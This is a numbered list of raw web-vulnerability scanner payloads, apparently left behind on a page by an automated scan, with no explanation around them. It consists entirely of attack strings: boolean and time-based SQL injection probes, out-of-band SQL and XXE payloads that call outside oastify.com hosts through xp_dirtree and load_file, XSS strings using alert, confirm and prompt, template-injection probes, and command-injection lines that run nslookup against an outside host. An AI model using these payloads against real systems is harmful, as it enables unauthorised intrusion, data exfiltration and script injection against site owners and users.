  909. SUGRYQ’);declare @q varchar(99);set @q=’\\ojb2ygwemjhvz45a1gcqiij3uu0nodc45sxfn3c.oasti’+’fy.com\rhn’; exec master.dbo.xp_dirtree @q;–


  910. (select load_file(‘\\\\xdebspqngsb4tdzjvp6zcrdco3uwim6d810oqcf.oastify.com\\ulh’))


  911. SUGRYQ’+(select load_file(‘\\\\0fgeussqivd7vg1mxs82euffq6wzkp8gb43rtfi.oastify.com\\fmu’))+’


  912. 85594109′ or ‘5677’=’5677


  913. 45232720′ or ‘5303’=’5305


  914. 51510884′ or 7779=7779–


  915. 38124659′ or 9546=9550–


  916. ‘ and ‘1839’=’1839


  917. ‘ and ‘4260’=’4265


  918. SUGRYQ87954208′ or ‘1339’=’1339


  919. ‘ and 9967=9967–


  920. SUGRYQ11925740′ or ‘8031’=’8040


  921. ‘ and 5842=5848–


  925. p36avw34j8


  929. (select extractvalue(xmltype(‘<!DOCTYPE root [ %sawty;]>’),’/l’) from dual)


  930. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %sawty;]>’),’/l’) from dual)||’


  931. ;declare @q varchar(99);set @q=’\\m0n0fedc3hytg2m8ietozg01bshl5it9jxbk18q.oasti’+’fy.com\hfh’; exec master.dbo.xp_dirtree @q;–


  934. ‘;declare @q varchar(99);set @q=’\\ehzsw6u4k9flxu30z6agg8htskydmaa11ptcj08.oasti’+’fy.com\rty’; exec master.dbo.xp_dirtree @q;–


  935. );declare @q varchar(99);set @q=’\\0ste7s5qvvq78gemasl2rusf369zxwlndb5yvmk.oasti’+’fy.com\bfr’; exec master.dbo.xp_dirtree @q;–


  936. ‘);declare @q varchar(99);set @q=’\\5pvj4x2vs0nc5lbr7xi7ozpk0b64u1isbg33tri.oasti’+’fy.com\wkh’; exec master.dbo.xp_dirtree @q;–


  937. (select load_file(‘\\\\zwzdbr9pzuu6cfilerp1vtwe75dy1vpmrajx9ly.oastify.com\\nye’))


  938. ‘+(select load_file(‘\\\\g8pun8l6bb6nowu2q81i7a8vjmpfdc134rwem2b.oastify.com\\nva’))+’


  939. (select extractvalue(xmltype(‘<!DOCTYPE root [ %axnwn;]>’),’/l’) from dual)


  940. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %axnwn;]>’),’/l’) from dual)||’


  941. SUGRYQ;declare @q varchar(99);set @q=’\\277gmuksax59nitopu046w7hi8o1cr0iq6it8hx.oasti’+’fy.com\dgv’; exec master.dbo.xp_dirtree @q;–


  942. SUGRYQ’;declare @q varchar(99);set @q=’\\adros2q0g5bhtqzwv26cc4dpogu9iz6qxep1fp4.oasti’+’fy.com\dyl’; exec master.dbo.xp_dirtree @q;–


  943. SUGRYQ);declare @q varchar(99);set @q=’\\nvm1af8dyitub3h9dfopuhv26tcm0co3gr8ey2n.oasti’+’fy.com\sht’; exec master.dbo.xp_dirtree @q;–


  944. SUGRYQ’);declare @q varchar(99);set @q=’\\ld2zsdqbggbst1z7vd6ncfd0orukia61zprch06.oasti’+’fy.com\xej’; exec master.dbo.xp_dirtree @q;–


  945. (select load_file(‘\\\\ixjwcaa80dvpdyj4faqkwcxx8oeh27qysmk9axz.oastify.com\\ohx’))


  946. 93866365′ or ‘9500’=’9500


  947. SUGRYQ’+(select load_file(‘\\\\w30aiogm6r13jcpilowy2q3be2kv8lwcz0rnhb6.oastify.com\\bcp’))+’


  948. 18515035′ or ‘1574’=’1578


  949. 21353351′ or ‘3960’=’3960


  950. 45573302′ or ‘6830’=’6830′


  951. 63467210′ or 7463=7463–


  952. 34078472′ or 7497=7504–


  953. 17249210′ or 1093=1093–


  954. 58837684′ or 5102=5102′–


  955. ‘ and ‘9712’=’9712


  956. ‘ and ‘9796’=’9797


  957. ‘ and ‘9754’=’9754


  958. ‘ and ‘6227’=’6227′


  959. ‘ and 2760=2760–


  960. SUGRYQ19590710′ or ‘6341’=’6341


  961. ‘ and 9064=9071–


  962. SUGRYQ43960951′ or ‘4891’=’4893


  963. ‘ and 3431=3431–


  964. SUGRYQ41714390′ or ‘4524’=’4524


  965. ‘ and 2809=2809’–


  966. SUGRYQ92935537′ or ‘3948’=’3948′


  970. hj2ftndq9b


  971. j6u5fvsny7v35er4ogyg


  974. jkfzoc7znt%41edmv1umy12


  976. muubjdrz65\\lwxyaedind


  978. xjz9ktxt25Akmm481f7oq


  983. ffuuhalert(1)osjxc


  985. ffuuh%3cscript%3ealert%281%29%3c%2fscript%3eosjxc


  987. m33mxalert(1)px7if


  988. m33mx%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3epx7if


  992. zwxf2%3ca%20b%3dc%3eplf5y


  995. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ugbnv;]>’),’/l’) from dual)


  997. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ugbnv;]>’),’/l’) from dual)||’


  998. ;declare @q varchar(99);set @q=’\\8ajmp0nyd38fqowus03a92anler7f43vtjl6bu0.oasti’+’fy.com\fkz’; exec master.dbo.xp_dirtree @q;–


  1000. ‘;declare @q varchar(99);set @q=’\\7v3laz8xy2tebnhtdzo9u1vm6dc603oufi75xtm.oasti’+’fy.com\qxr’; exec master.dbo.xp_dirtree @q;–


  1002. );declare @q varchar(99);set @q=’\\dzgre5c328xkftlzh5sfy7zsajgc49s0kocb2zr.oasti’+’fy.com\xqz’; exec master.dbo.xp_dirtree @q;–


  1003. ‘);declare @q varchar(99);set @q=’\\zfidurspiud6vf1lxr81etfeq5wykv8m1atxjl8.oasti’+’fy.com\ssr’; exec master.dbo.xp_dirtree @q;–


  1005. (select load_file(‘\\\\lwlzbd9bzgusc1i7edpnvfw07rdk1hp8rwjj97y.oastify.com\\tgq’))


  1006. ‘+(select load_file(‘\\\\sfb6uksiindzv81exk8uemf7qywrko8fb33qtei.oastify.com\\vcn’))+’


  1011. 19566369′ or ‘9326’=’9326


  1012. 16520297′ or ‘5319’=’5323


  1013. SUGRYQth8ez%3cscript%3ealert%281%29%3c%2fscript%3eo55gq


  1014. 66001821′ or ‘7831’=’7831


  1016. 78030390′ or ‘3598’=’3598′


  1017. 21073692′ or 9455=9455–


  1018. SUGRYQj7vz4%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3euj2ys


  1019. 75546547′ or 3688=3691–


  1020. 74860678′ or 3683=3683–


  1022. 87626612′ or 4843=4843′–


  1023. ‘ and ‘6514’=’6514


  1025. ‘ and ‘2752’=’2759


  1026. ‘ and ‘9737’=’9737


  1027. ‘ and ‘3146’=’3146′


  1028. (select extractvalue(xmltype(‘<!DOCTYPE root [ %wcppj;]>’),’/l’) from dual)


  1029. ‘ and 4846=4846–


  1030. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %wcppj;]>’),’/l’) from dual)||’


  1031. ‘ and 7935=7942–


  1032. SUGRYQ;declare @q varchar(99);set @q=’\\z11dgrep4uz6hfnljru10t1ec5iy6oufk3cq2er.oasti’+’fy.com\yxx’; exec master.dbo.xp_dirtree @q;–


  1033. ‘ and 8581=8581–


  1034. SUGRYQ’;declare @q varchar(99);set @q=’\\q4v4jihg7l2xk6qcmixs3k45fwlp9fx6ough65v.oasti’+’fy.com\wat’; exec master.dbo.xp_dirtree @q;–


  1035. ‘ and 3708=3708’–


  1036. SUGRYQ);declare @q varchar(99);set @q=’\\6dkksyqwg1bdtmzsvy68c0dlocu5iv6myaqxgl5.oasti’+’fy.com\lns’; exec master.dbo.xp_dirtree @q;–


  1037. SUGRYQ’);declare @q varchar(99);set @q=’\\j3nxibg96e1qjzp5lbwl2d3yepki88wzpnha7yw.oasti’+’fy.com\gfu’; exec master.dbo.xp_dirtree @q;–


  1038. (select load_file(‘\\\\wkkazoxmnri30c6i2odyjqkbv21vpldcf07nxbm.oastify.com\\nzq’))


  1039. 6h8brpg107


  1040. SUGRYQ’+(select load_file(‘\\\\97enm1kza45gnptvp10b637oifo8cy0p3dv0loa.oastify.com\\bzl’))+’


  1041. x6mbvlyauf962slgcti9


  1042. h3pztdj7uw%41ttrv4c8fko


  1043. 55navsclrq\\lp8uyqtisv


  1044. yggmv6v364Acl3arn0eqz


  1045. alert%281%29


  1046. confirm(1)


  1048. h3muijmhhd


  1049. SUGRYQ56540016′ or ‘8073’=’8073


  1050. SUGRYQ74278771′ or ‘1220’=’1228


  1051. h3mui%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27confirm%281%29%27%2f%3e%3c%2fa%3ejmhhd


  1052. SUGRYQ22785760′ or ‘8210’=’8210


  1053. udrgyost6h


  1054. SUGRYQ19092669′ or ‘4127’=’4127′


  1056. udrgy%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22confirm%281%29%22%2f%3e%3c%2fa%3eost6h


  1068. (select extractvalue(xmltype(‘<!DOCTYPE root [ %gttav;]>’),’/l’) from dual)


  1069. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %gttav;]>’),’/l’) from dual)||’


  1072. ;declare @q varchar(99);set @q=’\\v2y9hnfl5q02ibohknvx1p2ad1ju7rvil6dt3hs.oasti’+’fy.com\smq’; exec master.dbo.xp_dirtree @q;–


  1075. ‘;declare @q varchar(99);set @q=’\\j4oxjbh97e2qkzq5mbxl3d4yfpli9fx6ough65v.oasti’+’fy.com\olt’; exec master.dbo.xp_dirtree @q;–


  1077. );declare @q varchar(99);set @q=’\\b1dpg3e146zihrnxj3ud051qchia67uymme94xt.oasti’+’fy.com\fhq’; exec master.dbo.xp_dirtree @q;–


  1080. ‘);declare @q varchar(99);set @q=’\\9aknp1nzd48gqpwvs13b93aolfr8f53wwko7ev3.oasti’+’fy.com\feb’; exec master.dbo.xp_dirtree @q;–


  1083. (select load_file(‘\\\\3fjhuvstiydavj1pxv85exfiq9w2kz8qae21sph.oastify.com\\utt’))


  1086. ‘+(select load_file(‘\\\\aiwox2v0l5ghyq4w02bch4iptgz9n6bxel68wwl.oastify.com\\bql’))+’


  1090. SUGRYQsxso6%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27confirm%281%29%27%2f%3e%3c%2fa%3edj07j


  1092. SUGRYQbxyxx%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22confirm%281%29%22%2f%3e%3c%2fa%3edothw


  1094. (select extractvalue(xmltype(‘<!DOCTYPE root [ %hlccf;]>’),’/l’) from dual)


  1095. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %hlccf;]>’),’/l’) from dual)||’


  1096. SUGRYQ;declare @q varchar(99);set @q=’\\uig8xmvklpg1ya4g0mbwhoi9t0ztnjba1ytlj98.oasti’+’fy.com\egr’; exec master.dbo.xp_dirtree @q;–


  1097. 21951306′ or ‘9933’=’9933


  1098. SUGRYQ’;declare @q varchar(99);set @q=’\\8y7md0by13wfeokug0rax2yn9ef73xroicaz0np.oasti’+’fy.com\okr’; exec master.dbo.xp_dirtree @q;–


  1099. 86566601′ or ‘3517’=’3525


  1100. 35716197′ or ‘4043’=’4043


  1101. SUGRYQ);declare @q varchar(99);set @q=’\\301hfvdt3yyagjmpivt5zx0ib9h25stjl7du3is.oasti’+’fy.com\ubl’; exec master.dbo.xp_dirtree @q;–


  1102. 17306727′ or ‘3505’=’3505′


  1103. SUGRYQ’);declare @q varchar(99);set @q=’\\n6u1lfjd9i4um3s9ofzp5h62htnmbcz3srkea2z.oasti’+’fy.com\hjs’; exec master.dbo.xp_dirtree @q;–


  1104. 81341254′ or 5022=5022–


  1105. (select load_file(‘\\\\dl2r05y3o8jk1t7z35efk7lswj2cq2etgh84ysn.oastify.com\\ngl’))


  1106. 36411219′ or 4091=4095–


  1107. SUGRYQ’+(select load_file(‘\\\\424ihwfu5z0bikoqkwv61y2jdaj37tvky8qvgj5.oastify.com\\amo’))+’


  1108. 44723427′ or 8407=8407–


  1109. 84647654′ or 4202=4202′–


  1110. ‘ and ‘1316’=’1316


  1111. ‘ and ‘9641’=’9642


  1112. ‘ and ‘9780’=’9780


  1113. ‘ and ‘8369’=’8369′


  1114. (select extractvalue(xmltype(‘<!DOCTYPE root [ %upovm;]>’),’/l’) from dual)


  1115. ‘ and 6241=6241–


  1116. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %upovm;]>’),’/l’) from dual)||’


  1117. ‘ and 6984=6987–


  1118. SUGRYQ;declare @q varchar(99);set @q=’\\ceuqt4r2h7cjus0yw47ed6erpivbj17sxgp3fr4.oasti’+’fy.com\iee’; exec master.dbo.xp_dirtree @q;–


  1119. ‘ and 4291=4291–


  1120. ‘ and 6821=6821’–


  1121. SUGRYQ’;declare @q varchar(99);set @q=’\\qhb4wiugklfxx63cziasgkh5swypmfa61uthj58.oasti’+’fy.com\wwj’; exec master.dbo.xp_dirtree @q;–


  1122. SUGRYQ);declare @q varchar(99);set @q=’\\vkj9znxlnqi20b6h2ndxjpkav11upkdb5zxmnac.oasti’+’fy.com\idg’; exec master.dbo.xp_dirtree @q;–


  1123. SUGRYQ’);declare @q varchar(99);set @q=’\\oqi25g3etjov64ca8gjqpiq31u7nvdj4cs4fu3j.oasti’+’fy.com\gym’; exec master.dbo.xp_dirtree @q;–


  1124. (select load_file(‘\\\\x31bipgn6s14jdpjlpwz2r3ce3kw8mwdy1qogc5.oastify.com\\sat’))


  1125. b9mawrmzac


  1126. SUGRYQ’+(select load_file(‘\\\\8z8me0cy23xffoluh0say2znaeg74xsovcnzdn2.oastify.com\\jpt’))+’


  1127. lr69tvs2wg8kphl7emg0


  1128. w5wffeereb%41sznd1lv9w2


  1129. nvx5koslpw\\lz1zylfxx6


  1130. (select extractvalue(xmltype(‘<!DOCTYPE root [ %nplww;]>’),’/l’) from dual)


  1131. vfyguihu15Ag557im46b3


  1132. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %nplww;]>’),’/l’) from dual)||’


  1134. SUGRYQ;declare @q varchar(99);set @q=’\\kk8yzcxanfir00662cdmjekzvq1jp9d03ovblza.oasti’+’fy.com\ihm’; exec master.dbo.xp_dirtree @q;–


  1135. btkckalert(1)g2hij


  1136. SUGRYQ’;declare @q varchar(99);set @q=’\\5djjsxqvg0bctlzrvx67czdkobu4iu6lx9pwfk4.oasti’+’fy.com\uyp’; exec master.dbo.xp_dirtree @q;–


  1137. btkck%3cscript%3ealert%281%29%3c%2fscript%3eg2hij


  1138. SUGRYQ);declare @q varchar(99);set @q=’\\187fntlrbw68ohunqt137v8gj7p0dq1ht5lsbg0.oasti’+’fy.com\fiv’; exec master.dbo.xp_dirtree @q;–


  1139. wby6ualert(1)qi0a4


  1140. SUGRYQ’);declare @q varchar(99);set @q=’\\czfqe4c227xjfslyh4sey6zraigb41sslgd33rs.oasti’+’fy.com\thz’; exec master.dbo.xp_dirtree @q;–


  1141. (select load_file(‘\\\\ykmczqxonti50e6k2qd0jskdv41xpndef27pxdm.oastify.com\\pfi’))


  1142. wby6u%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eqi0a4


  1143. SUGRYQ’+(select load_file(‘\\\\caqqp4n2d78jqswys43e96arlirbf13s6gy3ord.oastify.com\\ock’))+’


  1145. khf1s%3ca%20b%3dc%3elheg4


  1146. (select extractvalue(xmltype(‘<!DOCTYPE root [ %fymyv;]>’),’/l’) from dual)


  1147. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %fymyv;]>’),’/l’) from dual)||’


  1148. ;declare @q varchar(99);set @q=’\\1qsf5t3rtwo86hcn8tj3pvqg1770vxjo9c1zrng.oasti’+’fy.com\tna’; exec master.dbo.xp_dirtree @q;–


  1149. (select extractvalue(xmltype(‘<!DOCTYPE root [ %swqci;]>’),’/l’) from dual)


  1150. ‘;declare @q varchar(99);set @q=’\\5rxj6x4vu0pc7ldr9xk7qzrk2b84w1ksbg33tri.oasti’+’fy.com\inj’; exec master.dbo.xp_dirtree @q;–


  1151. );declare @q varchar(99);set @q=’\\299goumscx79pivoru248w9hk8q1ey2pudm0co1.oasti’+’fy.com\otd’; exec master.dbo.xp_dirtree @q;–


  1152. ‘);declare @q varchar(99);set @q=’\\266glujs9x49misoouz45w6hh8n1byzpsdk0aoz.oasti’+’fy.com\hwz’; exec master.dbo.xp_dirtree @q;–


  1153. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %swqci;]>’),’/l’) from dual)||’


  1154. (select load_file(‘\\\\jczxrbp9feaqszy5ub5lbdcynptihf567uzhp5e.oastify.com\\agn’))


  1155. ‘+(select load_file(‘\\\\wiiaxovmlrg3yc4i0obyhqibt2zvnsbje76uwil.oastify.com\\drr’))+’


  1156. SUGRYQ;declare @q varchar(99);set @q=’\\fi1tx7v5lagmyv4107bhh9iutlzen4bv1jt6ju8.oasti’+’fy.com\kis’; exec master.dbo.xp_dirtree @q;–


  1157. SUGRYQ’;declare @q varchar(99);set @q=’\\356hkvit8y3aljrpnvy54x5ig9m2asyjp7hu7iw.oasti’+’fy.com\qnw’; exec master.dbo.xp_dirtree @q;–


  1158. 54746713′ or ‘8307’=’8307


  1159. 94679638′ or ‘2218’=’2224


  1160. 16677016′ or ‘2232’=’2232


  1161. SUGRYQ);declare @q varchar(99);set @q=’\\0wxebs9qzvu7cgimesp2vuwf76dz1ppgh49rzfo.oasti’+’fy.com\wjt’; exec master.dbo.xp_dirtree @q;–


  1162. 51665762′ or ‘2280’=’2280′


  1163. 90021361′ or 1514=1514–


  1164. 48554720′ or 9160=9162–


  1165. 97494126′ or 6475=6475–


  1166. SUGRYQ’);declare @q varchar(99);set @q=’\\vji9ynwlmqh2zb5h1ncxipjau10uokcb5zxmnac.oasti’+’fy.com\ziz’; exec master.dbo.xp_dirtree @q;–


  1167. 46805638′ or 2043=2043′–


  1168. ‘ and ‘8050’=’8050


  1169. ‘ and ‘4593’=’4601


  1170. (select load_file(‘\\\\unl82m0kqpl13a9g5mgwmon9y04tsjgaiyal09p.oastify.com\\zwh’))


  1171. ‘ and ‘3838’=’3838


  1172. ‘ and ‘1684’=’1684′


  1173. ‘ and 7734=7734–


  1174. SUGRYQ’+(select load_file(‘\\\\ehzsw6u4k9flxu30z6agg8htskydm3audi55vtk.oastify.com\\mvo’))+’


  1175. ‘ and 3552=3555–


  1176. ‘ and 2538=2538–


  1177. ‘ and 4417=4417’–


  1178. tqw5gmv5dj


  1179. kez174e65rsgqev3e23o


  1180. as6fcfqfkt%41db3g8tqo9a


  1181. 38nza655j1\\lzliqd3t7p


  1182. p2xbzrk9jbAhdn3vnibfv


  1183. (select extractvalue(xmltype(‘<!DOCTYPE root [ %yurlf;]>’),’/l’) from dual)


  1184. confirm%281%29


  1185. prompt(1)


  1186. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %yurlf;]>’),’/l’) from dual)||’


  1188. dem8sjphnc


  1189. dem8s%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27prompt%281%29%27%2f%3e%3c%2fa%3ejphnc


  1190. SUGRYQ;declare @q varchar(99);set @q=’\\t1v7glej4oz0h9nfjluv0n18czis6iu9kxck28r.oasti’+’fy.com\ftn’; exec master.dbo.xp_dirtree @q;–


  1191. h5u4sefdw0


  1192. h5u4s%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22prompt%281%29%22%2f%3e%3c%2fa%3eefdw0


  1193. SUGRYQ’;declare @q varchar(99);set @q=’\\smi61kzipnkz288e4kfulmm7xy3rrhf86wyjo7d.oasti’+’fy.com\jgq’; exec master.dbo.xp_dirtree @q;–


  1194. SUGRYQ);declare @q varchar(99);set @q=’\\u728mmkkap51natgpm0w6o79i0otcj0asykla9z.oasti’+’fy.com\zth’; exec master.dbo.xp_dirtree @q;–


  1195. SUGRYQ’);declare @q varchar(99);set @q=’\\0ste7s5qvvq78gemasl2rusf369zxplge46rwfl.oasti’+’fy.com\yon’; exec master.dbo.xp_dirtree @q;–


  1196. (select load_file(‘\\\\qlf40iygoljx167c3ieskkl5ww2pqfe6gu8hy5n.oastify.com\\nej’))


  1197. SUGRYQ’+(select load_file(‘\\\\mrh06e4cuhpt72d89ekoqgr12s8lwbk2nqfd51u.oastify.com\\wmu’))+’


  1198. (select extractvalue(xmltype(‘<!DOCTYPE root [ %iqydg;]>’),’/l’) from dual)


  1199. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %iqydg;]>’),’/l’) from dual)||’


  1200. SUGRYQ;declare @q varchar(99);set @q=’\\qf94uisgildxv61cxi8sekf5qwwpkf86yuqhg55.oasti’+’fy.com\fqv’; exec master.dbo.xp_dirtree @q;–


  1201. SUGRYQ’;declare @q varchar(99);set @q=’\\gp9u4826sbnn5wb278iioapv0m6fu5iw9k17rvg.oasti’+’fy.com\wrw’; exec master.dbo.xp_dirtree @q;–


  1202. SUGRYQ);declare @q varchar(99);set @q=’\\301hfvdt3yyagjmpivt5zx0ib9h25stjl7du3is.oasti’+’fy.com\ldp’; exec master.dbo.xp_dirtree @q;–


  1203. SUGRYQ’);declare @q varchar(99);set @q=’\\0cderspqfva7sgymus52bucfn6tzhp5gy4qrgf5.oasti’+’fy.com\jla’; exec master.dbo.xp_dirtree @q;–


  1204. (select load_file(‘\\\\havvp9n7dc8oqxw3s93j9bawlnrgf63x5lx8nwc.oastify.com\\ihk’))


  1205. SUGRYQ’+(select load_file(‘\\\\k3oyicga6f1rj0p6lcwm2e3zeqkj89w0zorbhz6.oastify.com\\uwa’))+’


  1206. (select extractvalue(xmltype(‘<!DOCTYPE root [ %zhsep;]>’),’/l’) from dual)


  1207. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %zhsep;]>’),’/l’) from dual)||’


  1208. SUGRYQ;declare @q varchar(99);set @q=’\\srn66k4iunpz78de9kkuqmr72y8rwhk8aw2js7h.oasti’+’fy.com\pmg’; exec master.dbo.xp_dirtree @q;–


  1209. SUGRYQ’;declare @q varchar(99);set @q=’\\zhkdwrupkuf6xf3lzra1gthes5yymoaf13tqje8.oasti’+’fy.com\ttv’; exec master.dbo.xp_dirtree @q;–


  1210. SUGRYQ);declare @q varchar(99);set @q=’\\9y8nd1bz14wgepkvg1rbx3yo9ff83yrpjdb01oq.oasti’+’fy.com\zrf’; exec master.dbo.xp_dirtree @q;–


  1211. SUGRYQ’);declare @q varchar(99);set @q=’\\0jkeyswqmvh7zg5m1sc2iujfu60zopcg54xrnfc.oasti’+’fy.com\ntp’; exec master.dbo.xp_dirtree @q;–


  1212. (select load_file(‘\\\\ciyqx4v2l7gjys4y04beh6irtizbn1bsdg53vrk.oastify.com\\lxk’))


  1213. SUGRYQ’+(select load_file(‘\\\\wtta8o6mwrr39cfibomysqtb42avylmcp0hn7bw.oastify.com\\rsb’))+’


  1215. SUGRYQ35474681′ or ‘4220’=’4220


  1216. SUGRYQ23579235′ or ‘1070’=’1078


  1217. SUGRYQ53604903′ or ‘9038’=’9038


  1218. SUGRYQ46800406′ or ‘6287’=’6287′


  1243. SUGRYQtn53o%3cscript%3ealert%281%29%3c%2fscript%3em1fdp


  1245. SUGRYQcojw9%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eexo94


  1248. (select extractvalue(xmltype(‘<!DOCTYPE root [ %jqhar;]>’),’/l’) from dual)


  1249. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %jqhar;]>’),’/l’) from dual)||’


  1250. SUGRYQ;declare @q varchar(99);set @q=’\\yvxcaq8oytt5behkdqo0usvd64cx0noee26pwdl.oasti’+’fy.com\pwx’; exec master.dbo.xp_dirtree @q;–


  1251. SUGRYQ’;declare @q varchar(99);set @q=’\\k1mygcea4fzrh0n6jcum0e1zcqij69u0lodb3zs.oasti’+’fy.com\sgd’; exec master.dbo.xp_dirtree @q;–


  1252. SUGRYQ);declare @q varchar(99);set @q=’\\jbyxqbo9ee9qrzx5tb4ladbympsig84zwnoaey3.oasti’+’fy.com\tcl’; exec master.dbo.xp_dirtree @q;–


  1253. SUGRYQ’);declare @q varchar(99);set @q=’\\fxgtc7a50avmdvj1f7qhw9xu8lee24qvjjb61uq.oasti’+’fy.com\dgs’; exec master.dbo.xp_dirtree @q;–


  1254. (select load_file(‘\\\\mka0zexcnhit02682edojgk1vs1lpbd2fq7dx1m.oastify.com\\icj’))


  1255. SUGRYQ’+(select load_file(‘\\\\00yefsdq3vy7ggmmist2zu0fb6hz5ptgw4oref3.oastify.com\\jjm’))+’


  1256. SUGRYQ13918455′ or ‘9460’=’9460


  1257. SUGRYQ41127247′ or ‘9294’=’9296


  1258. SUGRYQ39893862′ or ‘9981’=’9981


  1259. SUGRYQ15754179′ or ‘1047’=’1047′


  1286. SUGRYQm56pw%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27prompt%281%29%27%2f%3e%3c%2fa%3ejotmf


  1288. SUGRYQjgyd1%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22prompt%281%29%22%2f%3e%3c%2fa%3ehewf4


  1548. ‘”>


  1550. javascript:/*


  1563. 5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z


  1564. 5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z


  1567. 5550pWR8OHS’; waitfor delay ‘0:0:15’ —


  1568. 555-1) OR 737=(SELECT 737 FROM PG_SLEEP(15))–


  1569. 555O4wRK0CT’) OR 185=(SELECT 185 FROM PG_SLEEP(15))–


  1570. 555yfYposaE’)) OR 194=(SELECT 194 FROM PG_SLEEP(15))–


  1571. 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),4.455)


  1572. 555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’


  1579. 2nbyuKchWGds8jExXkwxoOUoQwt


  1580. 2p8gW8U36wqQWK1x9qEjBFVuhWb


  1582. (select extractvalue(xmltype(‘<!DOCTYPE root [ %oenri;]>’),’/l’) from dual)


  1583. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %oenri;]>’),’/l’) from dual)||’


  1584. ;declare @q varchar(99);set @q=’\\hl6i4qs70ojoy661nebh996hb8h15rtij6bt1hq.oasti’+’fy.com\bov’; exec master.dbo.xp_dirtree @q;–


  1585. ‘;declare @q varchar(99);set @q=’\\m9wnsvgcot7tmbu6bjzmxeumzd56twhn8b0yqmf.oasti’+’fy.com\sgx’; exec master.dbo.xp_dirtree @q;–


  1586. );declare @q varchar(99);set @q=’\\od5pwxkesvbvqdy8fl3o1gyo3f98xylpdd50vok.oasti’+’fy.com\edb’; exec master.dbo.xp_dirtree @q;–


  1587. ‘);declare @q varchar(99);set @q=’\\z220l89ph606fonj4wszqrnzsqyjm9a03ovblza.oasti’+’fy.com\jwp’; exec master.dbo.xp_dirtree @q;–


  1588. (select load_file(‘\\\\ccsdvlj2rjajp1xwe92c04xc238wwmkdm1eo4ct.oastify.com\\anw’))


  1589. ‘+(select load_file(‘\\\\w74xq5emm353klsg9txwvoswxn3gr6fxila80wp.oastify.com\\exa’))+’


  1590. 59608867′ or ‘8649’=’8649


  1591. 61086204′ or ‘6506’=’6515


  1592. 98827340′ or ‘3011’=’3011


  1593. 42177385′ or ‘7217’=’7217′


  1594. 47847764′ or 9591=9591–


  1595. 41192723′ or 9983=9985–


  1596. 14265776′ or 7764=7764–


  1597. 85579678′ or 6578=6578′–


  1598. ‘ and ‘7670’=’7670


  1599. ‘ and ‘1333’=’1341


  1600. ‘ and ‘8006’=’8006


  1601. ‘ and ‘8723’=’8723′


  1602. ‘ and 4050=4050–


  1603. ‘ and 7273=7274–


  1604. ‘ and 3134=3134–


  1605. ‘ and 7616=7616’–


  1606. ortt73r3xt


  1607. prompt%281%29


  1609. s1x06prompt(1)waqti


  1610. s1x06%3cscript%3eprompt%281%29%3c%2fscript%3ewaqti


  1611. m1bb2prompt(1)uzv0v


  1612. m1bb2%3cScRiPt%3eprompt%281%29%3c%2fScRiPt%3euzv0v


  1614. gkiqr%3ca%20b%3dc%3ewnwy9


  1615. pz8cy${442*353}j9kvg


  1616. mw0cj{{257*489}}nrstm


  1617. q8bqp#{300*806}hmw56


  1618. wg3d5[[997*534]]nhxx3


  1619. bcpzl${file.separator}z8vld


  1620. l9jh5%{513*448}n4dvn


  1621. gem3i{{583|add:989}}aa9ub


  1622. #set ($a=877*311) dbhfs${a}nwbrs


  1623. hrlwmd82h6


  1624. dseb1
    = 137*857


  1625. zl721{{.}}ttf17{{..}}lhng0


  1626. lwu85__${881*793}__nczms


  1627. }}f5uj6’/”<aq67m


  1628. %}m9dss’/”<dbgxw


  1629. fyyqo%>sa152’/”<zdok9


  1630. 3owrgejp95995mfn0ihr


  1631. aengghj4i9%413lidogtxbx


  1632. h1m2ejboak\\l2k21z89f1


  1633. 2o06fcl6sqAlnw6fy0kd8


  1634. vcbwv4jlr2a2pkxfes2v0nxv2m8fw5kx8pvfj4.oastify.com


  1636. nslookup -q=cname fo7g7ov53mmm149zqcefc79fe6kz8pwiz6rthh6.oastify.com.&


  1637. |nslookup -q=cname zux0d81p96s67ofjwwkzirfzkqqje925qxdn1c.oastify.com.&


